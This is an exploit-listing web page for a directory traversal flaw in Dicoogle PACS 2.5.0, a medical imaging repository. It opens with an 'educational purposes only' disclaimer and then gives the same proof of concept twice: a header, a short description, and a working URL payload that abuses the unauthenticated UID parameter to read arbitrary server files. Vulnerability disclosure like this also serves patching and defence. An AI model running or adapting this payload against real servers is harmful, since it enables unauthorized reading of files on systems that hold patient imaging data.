Dicoogle pacs 2.5.0 directory traversal Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2018-07-11 | Type : webapps | Platform : multiple
This exploit / vulnerability Dicoogle pacs 2.5.0 directory traversal is for educational purposes only and if it is used you will do on your own risk!


[+] Code ...

# Exploit Title: Dicoogle PACS 2.5.0 - Directory Traversal
# Date: 2018-05-25
# Software Link: http://www.dicoogle.com/home
# Version: Dicoogle PACS 2.5.0-20171229_1522
# Category: webapps
# Tested on: Windows 2012 R2
# Exploit Author: Carlos Avila
# Contact: http://twitter.com/badboy_nt

# 1. Description
# Dicoogle is an open source medical imaging repository with an extensible
# indexing system and distributed mechanisms. In version 2.5.0, it is vulnerable
# to local file inclusion. This allows an attacker to read arbitrary files that the
# web user has access to. Admin credentials aren't required. The ‘UID’ parameter
# via GET is vulnerable.

# 2. Proof of Concept

http://Target:8080/exportFile?UID=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
# Exploit Title: Dicoogle PACS 2.5.0 - Directory Traversal
# Date: 2018-05-25
# Software Link: http://www.dicoogle.com/home
# Version: Dicoogle PACS 2.5.0-20171229_1522
# Category: webapps
# Tested on: Windows 2012 R2
# Exploit Author: Carlos Avila
# Contact: http://twitter.com/badboy_nt

# 1. Description
# Dicoogle is an open source medical imaging repository with an extensible
# indexing system and distributed mechanisms. In version 2.5.0, it is vulnerable
# to local file inclusion. This allows an attacker to read arbitrary files that the
# web user has access to. Admin credentials aren't required. The ‘UID’ parameter
# via GET is vulnerable.

# 2. Proof of Concept

http://Target:8080/exportFile?UID=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini